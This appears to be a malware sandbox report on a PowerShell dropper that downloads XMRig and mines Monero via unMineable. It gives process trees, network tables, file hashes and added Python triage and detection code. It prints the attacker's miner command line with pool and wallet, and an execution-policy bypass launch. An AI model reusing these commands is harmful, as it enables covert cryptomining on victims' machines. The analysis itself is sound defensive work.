| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1448 wrote to memory of 3812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1448 wrote to memory of 3812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
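The Network tables on this page mix three kinds of rows: forward DNS queries to the guest's resolver, the actual TCP sessions (the GitHub download of the xmrig release asset and the stratum+ssl session to rx.unmineable.com), and reverse (in-addr.arpa / ip6.arpa) lookups of addresses the guest had just talked to, which carry no indicator value on their own. This detonation also logs one TCP session to a bare address with no associated name (138.91.171.81:80), which the report does not attribute to the sample and which must be verified separately before it goes on a blocklist. The parser below is an added example, not part of this report: it reads a table like the one above (this detonation's rows are embedded as constructed sample input, including the row whose Domain cell is empty and whose remaining cells slid one column to the left in the rendered table), repairs that row, separates indicators from resolver noise, and converts the reverse-lookup names back to addresses so they can be matched against the connections seen. The resolver address in RESOLVERS is an assumption taken from the table (8.8.8.8) and should be set per environment.

```python
import re
from typing import Dict, List, Optional

# Constructed sample input: the behavioral30 "Network" table above, copied as
# markdown rows, including the row whose Domain/Proto cells are shifted.
SAMPLE_NETWORK_TABLE = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
"""

# The guest's DNS resolver (assumption: 8.8.8.8 as in the table; set per environment).
RESOLVERS = {"8.8.8.8:53"}
_REVERSE_RE = re.compile(r"\.(in-addr|ip6)\.arpa$", re.I)


def parse_network_table(text: str) -> List[Dict[str, str]]:
    """Parse the four-column table; a row whose Domain cell is missing and whose
    Proto value slid into the Domain column is put back in order."""
    rows = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells
        if proto == "" and domain.lower() in ("tcp", "udp"):
            domain, proto = "", domain
        rows.append({"country": country, "dest": dest,
                     "domain": domain.lower(), "proto": proto.lower()})
    return rows


def ptr_to_ip(name: str) -> Optional[str]:
    """Turn a reverse-lookup name back into the address that was looked up."""
    labels = name.lower().rstrip(".").split(".")
    if labels[-2:] == ["in-addr", "arpa"] and len(labels) == 6:
        return ".".join(reversed(labels[:4]))
    if labels[-2:] == ["ip6", "arpa"] and len(labels) == 34:
        nibbles = "".join(reversed(labels[:32]))
        return ":".join(nibbles[i:i + 4] for i in range(0, 32, 4))
    return None


def extract_network_iocs(rows: List[Dict[str, str]]) -> dict:
    """Separate indicators worth blocking or hunting from sandbox background noise."""
    resolved, connections, unresolved, ptr_ips = set(), set(), set(), set()
    for r in rows:
        if r["dest"] in RESOLVERS and r["proto"] == "udp":
            if _REVERSE_RE.search(r["domain"]):
                ip = ptr_to_ip(r["domain"])
                if ip:
                    ptr_ips.add(ip)
            elif r["domain"]:
                resolved.add(r["domain"])
            continue
        connections.add((r["dest"], r["domain"]))
        if not r["domain"]:
            unresolved.add(r["dest"])
    connected_ips = {dest.rsplit(":", 1)[0] for dest, _ in connections}
    return {
        "resolved_names": sorted(resolved),
        "connections": sorted(connections),
        # bare-IP sessions: hard-coded destinations or OS background traffic; verify each
        "unresolved_destinations": sorted(unresolved),
        # PTR queries for addresses the guest connected to explain themselves
        "ptr_for_connected_ips": sorted(ptr_ips & connected_ips),
        "ptr_for_other_ips": sorted(ptr_ips - connected_ips),
    }


if __name__ == "__main__":
    for key, value in extract_network_iocs(parse_network_table(SAMPLE_NETWORK_TABLE)).items():
        print(key, value)
```

On this table the result is three resolved names, four sessions, one unresolved destination (138.91.171.81:80) and one reverse lookup (52.111.243.29) for an address that appears in no logged session, which is the kind of row that deserves a second look rather than an automatic block entry.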
Files
memory/1448-3-0x00007FF97EED3000-0x00007FF97EED4000-memory.dmp
memory/1448-5-0x000001677ECA0000-0x000001677ECC2000-memory.dmp
memory/1448-9-0x000001677EF90000-0x000001677F006000-memory.dmp
memory/1448-8-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcgrs5zg.wky.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1448-10-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-25-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-29-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-30-0x00007FF97EED3000-0x00007FF97EED4000-memory.dmp
memory/1448-50-0x000001677EF70000-0x000001677EF82000-memory.dmp
memory/1448-63-0x000001677ECF0000-0x000001677ECFA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3812-92-0x00000222A5CA0000-0x00000222A5CC0000-memory.dmp
memory/1448-93-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-94-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/3812-95-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-96-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-97-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-98-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-99-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-100-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-101-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-102-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-103-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-104-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-105-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-106-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-107-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-108-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-109-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-110-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-111-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-112-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-113-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-114-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-115-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-116-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-117-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-118-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-119-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-120-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-121-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-122-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-123-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-124-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-125-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-126-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-127-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-128-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-129-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-130-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-131-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-132-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-133-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-134-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-135-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-136-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-137-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-138-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-139-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-140-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-141-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-142-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-143-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-144-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-145-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-146-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-147-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-148-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-149-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-150-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-151-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-152-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-153-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-154-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-155-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-156-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
memory/3812-157-0x00007FF623CB0000-0x00007FF6248E3000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:17
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1776s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches (no description, indicator, process or target recorded) | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3616 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3616 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
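The Processes and Network sections above carry the whole story of this run: PowerShell launched with `-ExecutionPolicy bypass -File` on a script in the user's Temp directory, fetched a release archive from GitHub (github.com, then objects.githubusercontent.com), and started the dropped `xmrig-6.21.3\xmrig.exe` with `-a rx` (RandomX, which is why the AdjustPrivilegeToken rows show xmrig.exe requesting SeLockMemoryPrivilege for large pages) against the unMineable pool over stratum+ssl on port 443. The `8.8.8.8:53` rows and the `in-addr.arpa` lookups are the sandbox resolver and its reverse lookups, not attacker infrastructure. The following added example (not part of the sandbox report and not XMRig code) parses the miner command line, applies three process-creation rules to a constructed copy of the process tree, and correlates the pool host with the report's TCP sessions; the record layout (pid, ppid, image, cmdline) is an assumption rather than a real log schema, and PID 5000 is a constructed benign control record.

```python
"""Triage of the process tree and network table above (behavioral32).

Added example, not part of the sandbox report or of XMRig. EVENTS and
NETWORK are constructed from the Processes, WriteProcessMemory and
Network sections; the record layout (pid, ppid, image, cmdline) is an
assumption, not a real log schema.
"""
import re
from urllib.parse import urlsplit

TEMP = "\\appdata\\local\\temp\\"  # user-writable drop location seen in the report

# PIDs 3616 -> 4176 come from the "PID 3616 wrote to memory of 4176" rows,
# i.e. PowerShell creating xmrig.exe. PID 5000 is a constructed benign control.
EVENTS = [
    {"pid": 3616, "ppid": 0,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"'},
    {"pid": 4176, "ppid": 3616,
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
                r"-o stratum+ssl://rx.unmineable.com:443 "
                r"-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x"},
    {"pid": 5000, "ppid": 0, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
]

# (destination, domain, proto) rows copied from the Network table.
NETWORK = [
    ("8.8.8.8:53", "github.com", "udp"),
    ("20.26.156.215:443", "github.com", "tcp"),
    ("8.8.8.8:53", "objects.githubusercontent.com", "udp"),
    ("185.199.108.133:443", "objects.githubusercontent.com", "tcp"),
    ("8.8.8.8:53", "133.108.199.185.in-addr.arpa", "udp"),
    ("8.8.8.8:53", "rx.unmineable.com", "udp"),
    ("161.35.34.195:443", "rx.unmineable.com", "tcp"),
    ("8.8.8.8:53", "195.34.35.161.in-addr.arpa", "udp"),
]

MINER_OPTS = {"-a": "algo", "-o": "pool", "-u": "user", "-p": "password"}


def argv_of(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_miner_cmdline(cmdline):
    """Return pool/wallet details for an XMRig-style command line, else None."""
    argv = argv_of(cmdline)
    opts = {MINER_OPTS[t]: argv[i + 1] for i, t in enumerate(argv[:-1]) if t in MINER_OPTS}
    pool = opts.get("pool", "")
    if not pool.startswith("stratum"):
        return None
    url = urlsplit(pool)  # stratum+ssl://host:port splits like any URL
    coin, _, rest = opts.get("user", "").partition(":")  # unMineable form: COIN:wallet.worker
    wallet, _, worker = rest.partition(".")
    return {"algo": opts.get("algo"), "tls": url.scheme.endswith("ssl"),
            "pool_host": url.hostname, "pool_port": url.port,
            "coin": coin, "wallet": wallet, "worker": worker}


def rule_hits(ev, by_pid):
    """Rule names that fire on one process-creation record."""
    hits = []
    image, cl = ev["image"].lower(), ev["cmdline"].lower()
    if image.endswith("powershell.exe") and "-executionpolicy bypass" in cl and "-file" in cl and TEMP in cl:
        hits.append("powershell_bypass_script_from_temp")
    parent = by_pid.get(ev["ppid"])
    if TEMP in image and parent and parent["image"].lower().endswith("powershell.exe"):
        hits.append("powershell_spawned_dropped_exe")
    if parse_miner_cmdline(ev["cmdline"]):
        hits.append("miner_cmdline")
    return hits


def triage(events=EVENTS, network=NETWORK):
    """Run the rules over every record and tie the pool host to real sessions."""
    by_pid = {e["pid"]: e for e in events}
    findings = {e["pid"]: rule_hits(e, by_pid) for e in events}
    miner = next((parse_miner_cmdline(e["cmdline"]) for e in events
                  if "miner_cmdline" in findings[e["pid"]]), None)
    # Resolver traffic to 8.8.8.8 and the in-addr.arpa PTR lookups are sandbox
    # noise; only the TCP sessions are actionable destinations.
    sessions = [(dst, dom) for dst, dom, proto in network if proto == "tcp"]
    pool_sessions = [dst for dst, dom in sessions if miner and dom == miner["pool_host"]]
    return {"findings": findings, "miner": miner,
            "tcp_sessions": sessions, "pool_sessions": pool_sessions}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(), indent=2))
```

The wallet and worker name are the durable indicators here: the pool host, the GitHub download path and the Temp file name can all change between samples, but the `-u` value is what gets paid, so it is the pivot to use when searching other reports for the same operator.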
Files
memory/3616-0-0x00007FFE06F23000-0x00007FFE06F24000-memory.dmp
memory/3616-5-0x000001E9E4110000-0x000001E9E4132000-memory.dmp
memory/3616-7-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
memory/3616-9-0x000001E9FC7C0000-0x000001E9FC836000-memory.dmp
memory/3616-10-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o1m4llql.m5i.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3616-25-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
memory/3616-48-0x000001E9FC780000-0x000001E9FC792000-memory.dmp
memory/3616-61-0x000001E9FC510000-0x000001E9FC51A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4176-90-0x0000014D58920000-0x0000014D58940000-memory.dmp
memory/4176-91-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/3616-93-0x00007FFE06F23000-0x00007FFE06F24000-memory.dmp
memory/4176-92-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/3616-94-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
memory/4176-95 through memory/4176-155: 0x00007FF792CF0000-0x00007FF793923000-memory.dmp (61 consecutive dumps of the same region)
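Two things in the Files section are worth checking rather than taking on trust. First, `__PSScriptPolicyTest_*.ps1` is the probe file PowerShell itself writes to the user's Temp directory at startup to test script policy (AppLocker/WDAC), and the four digests listed for it here are the digests of the one-byte content "1", so it is a PowerShell artifact, not part of the payload. Second, `xmrig.exe` has the same SHA-256 in every behavioral run on this page, so each run dropped a byte-identical binary. The following added example (not part of the sandbox report) verifies both from the digest strings copied off the page and adds a chunked hash helper for hunting the dropped binary on disk; the behavioral16 policy-test file has different digests, which the example shows do not correspond to "1".

```python
"""Check the dropped-file digests listed in the Files section above.

Added example, not part of the sandbox report. All digest strings are
copied from the report's Files sections.
"""
import hashlib

ALGOS = ("md5", "sha1", "sha256", "sha512")

# behavioral32: C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o1m4llql.m5i.ps1
POLICY_TEST_B32 = {
    "md5": "c4ca4238a0b923820dcc509a6f75849b",
    "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
    "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b",
    "sha512": "4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a",
}
# behavioral16: __PSScriptPolicyTest_2jzigi0y.ggf.ps1 (different content in that run)
POLICY_TEST_B16 = {
    "md5": "d17fe0a3f47be24a6453e9ef58c94641",
    "sha1": "6ab83620379fc69f80c0242105ddffd7d98d5d9d",
    "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7",
}
# SHA-256 of Temp\xmrig-6.21.3\xmrig.exe as listed in each run's Files section
XMRIG_SHA256_BY_RUN = {
    "behavioral32": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda",
    "behavioral10": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda",
    "behavioral16": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda",
}


def digests(data: bytes) -> dict:
    """All four digests the report lists, for an in-memory blob."""
    return {a: hashlib.new(a, data).hexdigest() for a in ALGOS}


def verify(data: bytes, expected: dict) -> dict:
    """Per algorithm: does data hash to the digest the report lists?"""
    got = digests(data)
    return {algo: got[algo] == h.lower() for algo, h in expected.items()}


def same_payload_across_runs(by_run: dict) -> bool:
    """True when every run dropped a byte-identical file."""
    return len({h.lower() for h in by_run.values()}) == 1


def file_matches(path: str, sha256_hex: str) -> bool:
    """Hunt helper: hash a local file in chunks and compare with a report digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest() == sha256_hex.lower()


if __name__ == "__main__":
    print("policy test (behavioral32) is the byte '1':", verify(b"1", POLICY_TEST_B32))
    print("policy test (behavioral16) is the byte '1':", verify(b"1", POLICY_TEST_B16))
    print("xmrig.exe identical across runs:", same_payload_across_runs(XMRIG_SHA256_BY_RUN))
```

When blocklisting, use the xmrig.exe SHA-256 and not the `__PSScriptPolicyTest` digests: the latter will match on every clean host that has ever started PowerShell.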
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:36
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4512 wrote to memory of 648 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4512 wrote to memory of 648 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
